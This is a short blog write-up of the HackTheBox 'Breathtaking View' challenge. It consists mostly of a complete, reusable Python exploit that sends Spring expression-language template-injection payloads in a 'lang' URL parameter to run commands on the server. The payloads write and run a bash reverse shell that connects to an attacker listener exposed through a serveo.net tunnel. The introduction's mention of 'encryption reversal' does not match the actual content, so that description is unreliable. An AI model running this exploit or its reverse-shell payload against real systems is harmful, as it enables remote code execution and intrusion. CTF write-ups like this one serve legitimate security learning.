Post

HackTheBox Breathtaking View Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Breathtaking View Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

1
2

nc -lnvp 9001
ssh -R 0:localhost:9001 serveo.net

ping serveo.net to get the ip

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

import urllib.parse
import requests
import sys

if len(sys.argv) != 3:
    print(f"Usage: {sys.argv[0]} <ip:port> <lhost:lport>")
    sys.exit(1)

host, port = sys.argv[1].split(':')
port = int(port)
base_url = f'http://{host}:{port}'
register_url = f'{base_url}/register'
login_url = f'{base_url}/login'
lhost, lport = sys.argv[2].split(':')
reverse_shell_payload = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
encoded_payload = urllib.parse.quote(reverse_shell_payload)
clean_url = f'{base_url}/?lang=__${{T(Runtime).getRuntime().exec(new+String[]{{"bash","-c","rm+shell.sh"}})}}__::.x'
exploit_url = f'{base_url}/?lang=__${{T(Runtime).getRuntime().exec(new+String[]{{"bash","-c","echo+\'{encoded_payload}\'+%3E+shell.sh"}})}}__::.x'
trigger_url = f'{base_url}/?lang=__${{T(Runtime).getRuntime().exec(new+String[]{{"bash","-c","bash+shell.sh"}})}}__::.x'
session = requests.Session()
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
}
data = {
    'username': 'a',
    'password': 'a'
}

def make_request(url, method='POST', data=None):
    try:
        if method == 'POST':
            response = session.post(url, headers=headers, data=data)
        elif method == 'GET':
            response = session.get(url, headers=headers)
        return response
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None

print("Registering user...")
make_request(register_url, method='POST', data=data)
print("Logging in...")
make_request(login_url, method='POST', data=data)
print("Triggering reverse shell...")
response = make_request(clean_url, method='GET')
response = make_request(exploit_url, method='GET')
response = make_request(trigger_url, method='GET')
print("Exploit triggered. Reverse shell should be active now.")

1

cat flag.txt

Summary

The Breathtaking View Challenge on Hack The Box is an easy-level challenge focused on web exploitation and reverse shell techniques. It involves setting up a listener with nc and forwarding it via Serveo to expose the local machine to the internet. A Python script is used to exploit a vulnerability in the web app by sending crafted payloads that create and execute a reverse shell (shell.sh) on the server. Once triggered, the reverse shell connects back to the attacker’s machine, allowing access to the flag. This challenge introduces basic concepts of web exploitation, reverse shells, and command injection.

challenge
htb challenge writeup linux web
This post is licensed under CC BY 4.0 by the author.